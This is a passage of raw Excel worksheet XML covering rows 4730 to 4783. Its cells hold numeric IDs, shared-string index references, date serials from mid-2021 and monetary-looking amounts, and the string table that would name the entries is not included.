      <c r="E4730">
        <v>19</v>
      </c>
      <c r="F4730" t="s">
        <v>13889</v>
      </c>
      <c r="G4730" s="1">
        <v>44379</v>
      </c>
      <c r="H4730">
        <v>390000</v>
      </c>
      <c r="I4730" t="s">
        <v>13888</v>
      </c>
    </row>
    <row r="4731" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4731">
        <v>25462</v>
      </c>
      <c r="B4731">
        <v>5615</v>
      </c>
      <c r="C4731" t="s">
        <v>9119</v>
      </c>
      <c r="D4731" t="s">
        <v>13890</v>
      </c>
      <c r="E4731">
        <v>26</v>
      </c>
      <c r="F4731" t="s">
        <v>3499</v>
      </c>
      <c r="G4731" s="1">
        <v>44375</v>
      </c>
      <c r="H4731">
        <v>0</v>
      </c>
      <c r="J4731" t="s">
        <v>10618</v>
      </c>
    </row>
    <row r="4732" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4732">
        <v>25465</v>
      </c>
      <c r="B4732">
        <v>1732</v>
      </c>
      <c r="C4732" t="s">
        <v>6553</v>
      </c>
      <c r="D4732" t="s">
        <v>13891</v>
      </c>
      <c r="E4732">
        <v>26</v>
      </c>
      <c r="F4732" t="s">
        <v>364</v>
      </c>
      <c r="G4732" s="1">
        <v>44321</v>
      </c>
      <c r="H4732">
        <v>6200000</v>
      </c>
      <c r="J4732" t="s">
        <v>13892</v>
      </c>
    </row>
    <row r="4733" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4733">
        <v>25469</v>
      </c>
      <c r="B4733">
        <v>495</v>
      </c>
      <c r="C4733" t="s">
        <v>16517</v>
      </c>
      <c r="D4733" t="s">
        <v>16519</v>
      </c>
      <c r="E4733">
        <v>26</v>
      </c>
      <c r="F4733" t="s">
        <v>2236</v>
      </c>
      <c r="G4733" s="1">
        <v>44378</v>
      </c>
      <c r="H4733" s="4">
        <v>10000</v>
      </c>
      <c r="J4733" t="s">
        <v>13893</v>
      </c>
    </row>
    <row r="4734" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4734">
        <v>25470</v>
      </c>
      <c r="B4734">
        <v>495</v>
      </c>
      <c r="C4734" t="s">
        <v>16517</v>
      </c>
      <c r="D4734" t="s">
        <v>16519</v>
      </c>
      <c r="E4734">
        <v>26</v>
      </c>
      <c r="F4734" t="s">
        <v>4686</v>
      </c>
      <c r="G4734" s="1">
        <v>44378</v>
      </c>
      <c r="H4734" s="4">
        <v>10000</v>
      </c>
      <c r="J4734" t="s">
        <v>13894</v>
      </c>
    </row>
    <row r="4735" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4735">
        <v>25471</v>
      </c>
      <c r="B4735">
        <v>495</v>
      </c>
      <c r="C4735" t="s">
        <v>16517</v>
      </c>
      <c r="D4735" t="s">
        <v>16519</v>
      </c>
      <c r="E4735">
        <v>26</v>
      </c>
      <c r="F4735" t="s">
        <v>13895</v>
      </c>
      <c r="G4735" s="1">
        <v>44378</v>
      </c>
      <c r="H4735" s="4">
        <v>250000</v>
      </c>
      <c r="J4735" t="s">
        <v>13896</v>
      </c>
    </row>
    <row r="4736" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4736">
        <v>25472</v>
      </c>
      <c r="B4736">
        <v>495</v>
      </c>
      <c r="C4736" t="s">
        <v>16517</v>
      </c>
      <c r="D4736" t="s">
        <v>16519</v>
      </c>
      <c r="E4736">
        <v>26</v>
      </c>
      <c r="F4736" t="s">
        <v>13897</v>
      </c>
      <c r="G4736" s="1">
        <v>44378</v>
      </c>
      <c r="H4736" s="4">
        <v>250000</v>
      </c>
      <c r="J4736" t="s">
        <v>13896</v>
      </c>
    </row>
    <row r="4737" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4737">
        <v>25473</v>
      </c>
      <c r="B4737">
        <v>495</v>
      </c>
      <c r="C4737" t="s">
        <v>16517</v>
      </c>
      <c r="D4737" t="s">
        <v>16519</v>
      </c>
      <c r="E4737">
        <v>26</v>
      </c>
      <c r="F4737" t="s">
        <v>9437</v>
      </c>
      <c r="G4737" s="1">
        <v>44378</v>
      </c>
      <c r="H4737" s="4">
        <v>350000</v>
      </c>
      <c r="J4737" t="s">
        <v>13898</v>
      </c>
    </row>
    <row r="4738" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4738">
        <v>25474</v>
      </c>
      <c r="B4738">
        <v>495</v>
      </c>
      <c r="C4738" t="s">
        <v>16517</v>
      </c>
      <c r="D4738" t="s">
        <v>16519</v>
      </c>
      <c r="E4738">
        <v>26</v>
      </c>
      <c r="F4738" t="s">
        <v>609</v>
      </c>
      <c r="G4738" s="1">
        <v>44378</v>
      </c>
      <c r="H4738" s="4">
        <v>200000</v>
      </c>
      <c r="J4738" t="s">
        <v>13899</v>
      </c>
    </row>
    <row r="4739" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4739">
        <v>25481</v>
      </c>
      <c r="B4739">
        <v>1025</v>
      </c>
      <c r="C4739" t="s">
        <v>4652</v>
      </c>
      <c r="D4739" t="s">
        <v>13900</v>
      </c>
      <c r="E4739">
        <v>7</v>
      </c>
      <c r="F4739" t="s">
        <v>12807</v>
      </c>
      <c r="G4739" s="1">
        <v>44327</v>
      </c>
      <c r="H4739">
        <v>1000</v>
      </c>
      <c r="I4739" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4740" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4740">
        <v>25482</v>
      </c>
      <c r="B4740">
        <v>1025</v>
      </c>
      <c r="C4740" t="s">
        <v>4652</v>
      </c>
      <c r="D4740" t="s">
        <v>13900</v>
      </c>
      <c r="E4740">
        <v>7</v>
      </c>
      <c r="F4740" t="s">
        <v>13901</v>
      </c>
      <c r="G4740" s="1">
        <v>44327</v>
      </c>
      <c r="H4740">
        <v>500</v>
      </c>
      <c r="I4740" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4741" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4741">
        <v>25483</v>
      </c>
      <c r="B4741">
        <v>1025</v>
      </c>
      <c r="C4741" t="s">
        <v>4652</v>
      </c>
      <c r="D4741" t="s">
        <v>13900</v>
      </c>
      <c r="E4741">
        <v>7</v>
      </c>
      <c r="F4741" t="s">
        <v>13902</v>
      </c>
      <c r="G4741" s="1">
        <v>44327</v>
      </c>
      <c r="H4741">
        <v>1000</v>
      </c>
      <c r="I4741" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4742" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4742">
        <v>25484</v>
      </c>
      <c r="B4742">
        <v>1025</v>
      </c>
      <c r="C4742" t="s">
        <v>4652</v>
      </c>
      <c r="D4742" t="s">
        <v>13900</v>
      </c>
      <c r="E4742">
        <v>7</v>
      </c>
      <c r="F4742" t="s">
        <v>13903</v>
      </c>
      <c r="G4742" s="1">
        <v>44327</v>
      </c>
      <c r="H4742">
        <v>300</v>
      </c>
    </row>
    <row r="4743" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4743">
        <v>25485</v>
      </c>
      <c r="B4743">
        <v>1025</v>
      </c>
      <c r="C4743" t="s">
        <v>4652</v>
      </c>
      <c r="D4743" t="s">
        <v>13900</v>
      </c>
      <c r="E4743">
        <v>7</v>
      </c>
      <c r="F4743" t="s">
        <v>10898</v>
      </c>
      <c r="G4743" s="1">
        <v>44327</v>
      </c>
      <c r="H4743">
        <v>300</v>
      </c>
      <c r="I4743" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4744" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4744">
        <v>25486</v>
      </c>
      <c r="B4744">
        <v>1248</v>
      </c>
      <c r="C4744" t="s">
        <v>2951</v>
      </c>
      <c r="D4744" t="s">
        <v>13829</v>
      </c>
      <c r="E4744">
        <v>11</v>
      </c>
      <c r="F4744" t="s">
        <v>4686</v>
      </c>
      <c r="G4744" s="1">
        <v>44362</v>
      </c>
      <c r="H4744">
        <v>1000</v>
      </c>
      <c r="J4744" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="4745" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4745">
        <v>25487</v>
      </c>
      <c r="B4745">
        <v>1248</v>
      </c>
      <c r="C4745" t="s">
        <v>2951</v>
      </c>
      <c r="D4745" t="s">
        <v>13829</v>
      </c>
      <c r="E4745">
        <v>11</v>
      </c>
      <c r="F4745" t="s">
        <v>13904</v>
      </c>
      <c r="G4745" s="1">
        <v>44362</v>
      </c>
      <c r="H4745">
        <v>1500</v>
      </c>
      <c r="J4745" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="4746" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4746">
        <v>25488</v>
      </c>
      <c r="B4746">
        <v>1248</v>
      </c>
      <c r="C4746" t="s">
        <v>2951</v>
      </c>
      <c r="D4746" t="s">
        <v>13829</v>
      </c>
      <c r="E4746">
        <v>11</v>
      </c>
      <c r="F4746" t="s">
        <v>11964</v>
      </c>
      <c r="G4746" s="1">
        <v>44362</v>
      </c>
      <c r="H4746">
        <v>2000</v>
      </c>
      <c r="J4746" t="s">
        <v>12888</v>
      </c>
    </row>
    <row r="4747" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4747">
        <v>25489</v>
      </c>
      <c r="B4747">
        <v>1248</v>
      </c>
      <c r="C4747" t="s">
        <v>2951</v>
      </c>
      <c r="D4747" t="s">
        <v>13829</v>
      </c>
      <c r="E4747">
        <v>11</v>
      </c>
      <c r="F4747" t="s">
        <v>9674</v>
      </c>
      <c r="G4747" s="1">
        <v>44362</v>
      </c>
      <c r="H4747">
        <v>5000</v>
      </c>
      <c r="J4747" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="4748" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4748">
        <v>25490</v>
      </c>
      <c r="B4748">
        <v>1248</v>
      </c>
      <c r="C4748" t="s">
        <v>2951</v>
      </c>
      <c r="D4748" t="s">
        <v>13829</v>
      </c>
      <c r="E4748">
        <v>11</v>
      </c>
      <c r="F4748" t="s">
        <v>10581</v>
      </c>
      <c r="G4748" s="1">
        <v>44362</v>
      </c>
      <c r="H4748">
        <v>1000</v>
      </c>
      <c r="J4748" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="4749" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4749">
        <v>25492</v>
      </c>
      <c r="B4749">
        <v>1764</v>
      </c>
      <c r="C4749" t="s">
        <v>5918</v>
      </c>
      <c r="D4749" t="s">
        <v>10772</v>
      </c>
      <c r="E4749">
        <v>5</v>
      </c>
      <c r="F4749" t="s">
        <v>13905</v>
      </c>
      <c r="G4749" s="1">
        <v>44327</v>
      </c>
      <c r="H4749">
        <v>300</v>
      </c>
      <c r="J4749" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4750" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4750">
        <v>25508</v>
      </c>
      <c r="B4750">
        <v>5492</v>
      </c>
      <c r="C4750" t="s">
        <v>8839</v>
      </c>
      <c r="D4750" t="s">
        <v>13568</v>
      </c>
      <c r="E4750">
        <v>26</v>
      </c>
      <c r="F4750" t="s">
        <v>13906</v>
      </c>
      <c r="G4750" s="1">
        <v>44337</v>
      </c>
      <c r="H4750">
        <v>120000</v>
      </c>
      <c r="I4750" t="s">
        <v>9693</v>
      </c>
      <c r="J4750" t="s">
        <v>13907</v>
      </c>
    </row>
    <row r="4751" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4751">
        <v>25509</v>
      </c>
      <c r="B4751">
        <v>5492</v>
      </c>
      <c r="C4751" t="s">
        <v>8839</v>
      </c>
      <c r="D4751" t="s">
        <v>13568</v>
      </c>
      <c r="E4751">
        <v>26</v>
      </c>
      <c r="F4751" t="s">
        <v>13908</v>
      </c>
      <c r="G4751" s="1">
        <v>44337</v>
      </c>
      <c r="H4751">
        <v>180000</v>
      </c>
      <c r="I4751" t="s">
        <v>9693</v>
      </c>
      <c r="J4751" t="s">
        <v>13907</v>
      </c>
    </row>
    <row r="4752" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4752">
        <v>25510</v>
      </c>
      <c r="B4752">
        <v>5492</v>
      </c>
      <c r="C4752" t="s">
        <v>8839</v>
      </c>
      <c r="D4752" t="s">
        <v>13568</v>
      </c>
      <c r="E4752">
        <v>26</v>
      </c>
      <c r="F4752" t="s">
        <v>9437</v>
      </c>
      <c r="G4752" s="1">
        <v>44337</v>
      </c>
      <c r="H4752">
        <v>60000</v>
      </c>
      <c r="I4752" t="s">
        <v>9693</v>
      </c>
      <c r="J4752" t="s">
        <v>13907</v>
      </c>
    </row>
    <row r="4753" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4753">
        <v>25511</v>
      </c>
      <c r="B4753">
        <v>5492</v>
      </c>
      <c r="C4753" t="s">
        <v>8839</v>
      </c>
      <c r="D4753" t="s">
        <v>13568</v>
      </c>
      <c r="E4753">
        <v>26</v>
      </c>
      <c r="F4753" t="s">
        <v>7241</v>
      </c>
      <c r="G4753" s="1">
        <v>44337</v>
      </c>
      <c r="H4753">
        <v>120000</v>
      </c>
      <c r="I4753" t="s">
        <v>9693</v>
      </c>
      <c r="J4753" t="s">
        <v>13907</v>
      </c>
    </row>
    <row r="4754" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4754">
        <v>25513</v>
      </c>
      <c r="B4754">
        <v>5492</v>
      </c>
      <c r="C4754" t="s">
        <v>8839</v>
      </c>
      <c r="D4754" t="s">
        <v>13568</v>
      </c>
      <c r="E4754">
        <v>26</v>
      </c>
      <c r="F4754" t="s">
        <v>609</v>
      </c>
      <c r="G4754" s="1">
        <v>44337</v>
      </c>
      <c r="H4754">
        <v>120000</v>
      </c>
      <c r="I4754" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="4755" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4755">
        <v>25514</v>
      </c>
      <c r="B4755">
        <v>5651</v>
      </c>
      <c r="C4755" t="s">
        <v>9111</v>
      </c>
      <c r="D4755" t="s">
        <v>13909</v>
      </c>
      <c r="E4755">
        <v>2</v>
      </c>
      <c r="F4755" t="s">
        <v>9113</v>
      </c>
      <c r="G4755" s="1">
        <v>44340</v>
      </c>
      <c r="H4755">
        <v>360000</v>
      </c>
      <c r="I4755" t="s">
        <v>13910</v>
      </c>
    </row>
    <row r="4756" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4756">
        <v>25515</v>
      </c>
      <c r="B4756">
        <v>618</v>
      </c>
      <c r="C4756" t="s">
        <v>1719</v>
      </c>
      <c r="D4756" t="s">
        <v>11524</v>
      </c>
      <c r="E4756">
        <v>13</v>
      </c>
      <c r="F4756" t="s">
        <v>13911</v>
      </c>
      <c r="G4756" s="1">
        <v>44354</v>
      </c>
      <c r="H4756">
        <v>0</v>
      </c>
      <c r="I4756" t="s">
        <v>13912</v>
      </c>
      <c r="J4756" t="s">
        <v>13913</v>
      </c>
    </row>
    <row r="4757" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4757">
        <v>25527</v>
      </c>
      <c r="B4757">
        <v>5625</v>
      </c>
      <c r="C4757" t="s">
        <v>9139</v>
      </c>
      <c r="D4757" t="s">
        <v>13914</v>
      </c>
      <c r="E4757">
        <v>29</v>
      </c>
      <c r="F4757" t="s">
        <v>3341</v>
      </c>
      <c r="G4757" s="1">
        <v>44354</v>
      </c>
      <c r="H4757">
        <v>500</v>
      </c>
      <c r="I4757" t="s">
        <v>13915</v>
      </c>
    </row>
    <row r="4758" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4758">
        <v>25528</v>
      </c>
      <c r="B4758">
        <v>5625</v>
      </c>
      <c r="C4758" t="s">
        <v>9139</v>
      </c>
      <c r="D4758" t="s">
        <v>13914</v>
      </c>
      <c r="E4758">
        <v>29</v>
      </c>
      <c r="F4758" t="s">
        <v>13707</v>
      </c>
      <c r="G4758" s="1">
        <v>44354</v>
      </c>
      <c r="H4758">
        <v>100</v>
      </c>
      <c r="I4758" t="s">
        <v>13915</v>
      </c>
    </row>
    <row r="4759" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4759">
        <v>25531</v>
      </c>
      <c r="B4759">
        <v>1025</v>
      </c>
      <c r="C4759" t="s">
        <v>4652</v>
      </c>
      <c r="D4759" t="s">
        <v>13900</v>
      </c>
      <c r="E4759">
        <v>7</v>
      </c>
      <c r="F4759" t="s">
        <v>11351</v>
      </c>
      <c r="G4759" s="1">
        <v>44327</v>
      </c>
      <c r="H4759">
        <v>120</v>
      </c>
      <c r="I4759" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4760" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4760">
        <v>25542</v>
      </c>
      <c r="B4760">
        <v>5495</v>
      </c>
      <c r="C4760" t="s">
        <v>8903</v>
      </c>
      <c r="D4760" t="s">
        <v>13916</v>
      </c>
      <c r="E4760">
        <v>30</v>
      </c>
      <c r="F4760" t="s">
        <v>3341</v>
      </c>
      <c r="G4760" s="1">
        <v>44344</v>
      </c>
      <c r="H4760">
        <v>1800</v>
      </c>
      <c r="I4760" t="s">
        <v>13917</v>
      </c>
      <c r="J4760" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4761" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4761">
        <v>25543</v>
      </c>
      <c r="B4761">
        <v>5495</v>
      </c>
      <c r="C4761" t="s">
        <v>8903</v>
      </c>
      <c r="D4761" t="s">
        <v>13916</v>
      </c>
      <c r="E4761">
        <v>30</v>
      </c>
      <c r="F4761" t="s">
        <v>1403</v>
      </c>
      <c r="G4761" s="1">
        <v>44344</v>
      </c>
      <c r="H4761">
        <v>3000</v>
      </c>
      <c r="I4761" t="s">
        <v>13918</v>
      </c>
      <c r="J4761" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4762" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4762">
        <v>25544</v>
      </c>
      <c r="B4762">
        <v>5549</v>
      </c>
      <c r="C4762" t="s">
        <v>9147</v>
      </c>
      <c r="D4762" t="s">
        <v>13919</v>
      </c>
      <c r="E4762">
        <v>5</v>
      </c>
      <c r="F4762" t="s">
        <v>364</v>
      </c>
      <c r="G4762" s="1">
        <v>44354</v>
      </c>
      <c r="H4762">
        <v>6000000</v>
      </c>
      <c r="I4762" t="s">
        <v>9952</v>
      </c>
      <c r="J4762" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="4763" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4763">
        <v>25545</v>
      </c>
      <c r="B4763">
        <v>296</v>
      </c>
      <c r="C4763" t="s">
        <v>2414</v>
      </c>
      <c r="D4763" t="s">
        <v>13920</v>
      </c>
      <c r="E4763">
        <v>14</v>
      </c>
      <c r="F4763" t="s">
        <v>3076</v>
      </c>
      <c r="G4763" s="1">
        <v>44344</v>
      </c>
      <c r="H4763">
        <v>12000000</v>
      </c>
      <c r="J4763" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="4764" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4764">
        <v>25546</v>
      </c>
      <c r="B4764">
        <v>296</v>
      </c>
      <c r="C4764" t="s">
        <v>2414</v>
      </c>
      <c r="D4764" t="s">
        <v>13920</v>
      </c>
      <c r="E4764">
        <v>14</v>
      </c>
      <c r="F4764" t="s">
        <v>9437</v>
      </c>
      <c r="G4764" s="1">
        <v>44344</v>
      </c>
      <c r="H4764">
        <v>0</v>
      </c>
    </row>
    <row r="4765" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4765">
        <v>25547</v>
      </c>
      <c r="B4765">
        <v>296</v>
      </c>
      <c r="C4765" t="s">
        <v>2414</v>
      </c>
      <c r="D4765" t="s">
        <v>13920</v>
      </c>
      <c r="E4765">
        <v>14</v>
      </c>
      <c r="F4765" t="s">
        <v>13921</v>
      </c>
      <c r="G4765" s="1">
        <v>44344</v>
      </c>
      <c r="H4765">
        <v>0</v>
      </c>
    </row>
    <row r="4766" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4766">
        <v>25548</v>
      </c>
      <c r="B4766">
        <v>296</v>
      </c>
      <c r="C4766" t="s">
        <v>2414</v>
      </c>
      <c r="D4766" t="s">
        <v>13920</v>
      </c>
      <c r="E4766">
        <v>14</v>
      </c>
      <c r="F4766" t="s">
        <v>13922</v>
      </c>
      <c r="G4766" s="1">
        <v>44344</v>
      </c>
      <c r="H4766">
        <v>0</v>
      </c>
    </row>
    <row r="4767" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4767">
        <v>25549</v>
      </c>
      <c r="B4767">
        <v>1844</v>
      </c>
      <c r="C4767" t="s">
        <v>6620</v>
      </c>
      <c r="D4767" t="s">
        <v>13923</v>
      </c>
      <c r="E4767">
        <v>16</v>
      </c>
      <c r="F4767" t="s">
        <v>13924</v>
      </c>
      <c r="G4767" s="1">
        <v>44372</v>
      </c>
      <c r="H4767">
        <v>510000</v>
      </c>
      <c r="J4767" t="s">
        <v>13925</v>
      </c>
    </row>
    <row r="4768" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4768">
        <v>25550</v>
      </c>
      <c r="B4768">
        <v>1844</v>
      </c>
      <c r="C4768" t="s">
        <v>6620</v>
      </c>
      <c r="D4768" t="s">
        <v>13923</v>
      </c>
      <c r="E4768">
        <v>16</v>
      </c>
      <c r="F4768" t="s">
        <v>9567</v>
      </c>
      <c r="G4768" s="1">
        <v>44372</v>
      </c>
      <c r="H4768">
        <v>355000</v>
      </c>
      <c r="J4768" t="s">
        <v>13925</v>
      </c>
    </row>
    <row r="4769" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4769">
        <v>25551</v>
      </c>
      <c r="B4769">
        <v>1844</v>
      </c>
      <c r="C4769" t="s">
        <v>6620</v>
      </c>
      <c r="D4769" t="s">
        <v>13923</v>
      </c>
      <c r="E4769">
        <v>16</v>
      </c>
      <c r="F4769" t="s">
        <v>2236</v>
      </c>
      <c r="G4769" s="1">
        <v>44372</v>
      </c>
      <c r="H4769">
        <v>35000</v>
      </c>
      <c r="J4769" t="s">
        <v>13926</v>
      </c>
    </row>
    <row r="4770" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4770">
        <v>25552</v>
      </c>
      <c r="B4770">
        <v>1844</v>
      </c>
      <c r="C4770" t="s">
        <v>6620</v>
      </c>
      <c r="D4770" t="s">
        <v>13923</v>
      </c>
      <c r="E4770">
        <v>16</v>
      </c>
      <c r="F4770" t="s">
        <v>13927</v>
      </c>
      <c r="G4770" s="1">
        <v>44372</v>
      </c>
      <c r="H4770">
        <v>35000</v>
      </c>
      <c r="J4770" t="s">
        <v>13928</v>
      </c>
    </row>
    <row r="4771" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4771">
        <v>25553</v>
      </c>
      <c r="B4771">
        <v>1844</v>
      </c>
      <c r="C4771" t="s">
        <v>6620</v>
      </c>
      <c r="D4771" t="s">
        <v>13923</v>
      </c>
      <c r="E4771">
        <v>16</v>
      </c>
      <c r="F4771" t="s">
        <v>12040</v>
      </c>
      <c r="G4771" s="1">
        <v>44372</v>
      </c>
      <c r="H4771">
        <v>25000</v>
      </c>
      <c r="J4771" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="4772" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4772">
        <v>25554</v>
      </c>
      <c r="B4772">
        <v>5672</v>
      </c>
      <c r="C4772" t="s">
        <v>9156</v>
      </c>
      <c r="D4772" t="s">
        <v>13929</v>
      </c>
      <c r="E4772">
        <v>12</v>
      </c>
      <c r="F4772" t="s">
        <v>673</v>
      </c>
      <c r="G4772" s="1">
        <v>44327</v>
      </c>
      <c r="H4772">
        <v>600000</v>
      </c>
      <c r="J4772" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4773" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4773">
        <v>25555</v>
      </c>
      <c r="B4773">
        <v>5672</v>
      </c>
      <c r="C4773" t="s">
        <v>9156</v>
      </c>
      <c r="D4773" t="s">
        <v>13929</v>
      </c>
      <c r="E4773">
        <v>12</v>
      </c>
      <c r="F4773" t="s">
        <v>12198</v>
      </c>
      <c r="G4773" s="1">
        <v>44327</v>
      </c>
      <c r="H4773">
        <v>100000</v>
      </c>
      <c r="J4773" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4774" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4774">
        <v>25556</v>
      </c>
      <c r="B4774">
        <v>5640</v>
      </c>
      <c r="C4774" t="s">
        <v>9162</v>
      </c>
      <c r="D4774" t="s">
        <v>13930</v>
      </c>
      <c r="E4774">
        <v>17</v>
      </c>
      <c r="F4774" t="s">
        <v>3341</v>
      </c>
      <c r="G4774" s="1">
        <v>44316</v>
      </c>
      <c r="H4774">
        <v>1000</v>
      </c>
      <c r="I4774" t="s">
        <v>13931</v>
      </c>
    </row>
    <row r="4775" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4775">
        <v>25557</v>
      </c>
      <c r="B4775">
        <v>5640</v>
      </c>
      <c r="C4775" t="s">
        <v>9162</v>
      </c>
      <c r="D4775" t="s">
        <v>13930</v>
      </c>
      <c r="E4775">
        <v>17</v>
      </c>
      <c r="F4775" t="s">
        <v>13932</v>
      </c>
      <c r="G4775" s="1">
        <v>44316</v>
      </c>
      <c r="H4775">
        <v>10</v>
      </c>
      <c r="I4775" t="s">
        <v>13931</v>
      </c>
    </row>
    <row r="4776" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4776">
        <v>25558</v>
      </c>
      <c r="B4776">
        <v>5640</v>
      </c>
      <c r="C4776" t="s">
        <v>9162</v>
      </c>
      <c r="D4776" t="s">
        <v>13930</v>
      </c>
      <c r="E4776">
        <v>17</v>
      </c>
      <c r="F4776" t="s">
        <v>11356</v>
      </c>
      <c r="G4776" s="1">
        <v>44316</v>
      </c>
      <c r="H4776">
        <v>500</v>
      </c>
      <c r="I4776" t="s">
        <v>13931</v>
      </c>
    </row>
    <row r="4777" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4777">
        <v>25559</v>
      </c>
      <c r="B4777">
        <v>5640</v>
      </c>
      <c r="C4777" t="s">
        <v>9162</v>
      </c>
      <c r="D4777" t="s">
        <v>13930</v>
      </c>
      <c r="E4777">
        <v>17</v>
      </c>
      <c r="F4777" t="s">
        <v>11128</v>
      </c>
      <c r="G4777" s="1">
        <v>44316</v>
      </c>
      <c r="H4777">
        <v>200</v>
      </c>
      <c r="I4777" t="s">
        <v>13931</v>
      </c>
    </row>
    <row r="4778" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4778">
        <v>25560</v>
      </c>
      <c r="B4778">
        <v>5640</v>
      </c>
      <c r="C4778" t="s">
        <v>9162</v>
      </c>
      <c r="D4778" t="s">
        <v>13930</v>
      </c>
      <c r="E4778">
        <v>17</v>
      </c>
      <c r="F4778" t="s">
        <v>13933</v>
      </c>
      <c r="G4778" s="1">
        <v>44316</v>
      </c>
      <c r="H4778">
        <v>1300</v>
      </c>
      <c r="I4778" t="s">
        <v>13931</v>
      </c>
    </row>
    <row r="4779" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4779">
        <v>25562</v>
      </c>
      <c r="B4779">
        <v>5644</v>
      </c>
      <c r="C4779" t="s">
        <v>9132</v>
      </c>
      <c r="D4779" t="s">
        <v>13934</v>
      </c>
      <c r="E4779">
        <v>29</v>
      </c>
      <c r="F4779" t="s">
        <v>1207</v>
      </c>
      <c r="G4779" s="1">
        <v>44350</v>
      </c>
      <c r="H4779">
        <v>700</v>
      </c>
      <c r="I4779" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4780" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4780">
        <v>25564</v>
      </c>
      <c r="B4780">
        <v>5644</v>
      </c>
      <c r="C4780" t="s">
        <v>9132</v>
      </c>
      <c r="D4780" t="s">
        <v>13934</v>
      </c>
      <c r="E4780">
        <v>29</v>
      </c>
      <c r="F4780" t="s">
        <v>3341</v>
      </c>
      <c r="G4780" s="1">
        <v>44350</v>
      </c>
      <c r="H4780">
        <v>350</v>
      </c>
      <c r="I4780" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="4781" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4781">
        <v>25565</v>
      </c>
      <c r="B4781">
        <v>1663</v>
      </c>
      <c r="C4781" t="s">
        <v>3416</v>
      </c>
      <c r="D4781" t="s">
        <v>11799</v>
      </c>
      <c r="E4781">
        <v>31</v>
      </c>
      <c r="F4781" t="s">
        <v>13935</v>
      </c>
      <c r="G4781" s="1">
        <v>44371</v>
      </c>
      <c r="H4781">
        <v>5000</v>
      </c>
      <c r="I4781" t="s">
        <v>1098</v>
      </c>
      <c r="J4781" t="s">
        <v>10330</v>
      </c>
    </row>
    <row r="4782" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4782">
        <v>25567</v>
      </c>
      <c r="B4782">
        <v>5669</v>
      </c>
      <c r="C4782" t="s">
        <v>9171</v>
      </c>
      <c r="D4782" t="s">
        <v>16570</v>
      </c>
      <c r="E4782">
        <v>32</v>
      </c>
      <c r="F4782" t="s">
        <v>12898</v>
      </c>
      <c r="G4782" s="1">
        <v>44364</v>
      </c>
      <c r="H4782" s="4">
        <v>150000</v>
      </c>
      <c r="I4782" t="s">
        <v>13937</v>
      </c>
      <c r="J4782" t="s">
        <v>13938</v>
      </c>
    </row>
    <row r="4783" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4783">
        <v>25568</v>
      </c>
      <c r="B4783">
        <v>5650</v>
      </c>
      <c r="C4783" t="s">
        <v>9179</v>
      </c>
      <c r="D4783" t="s">
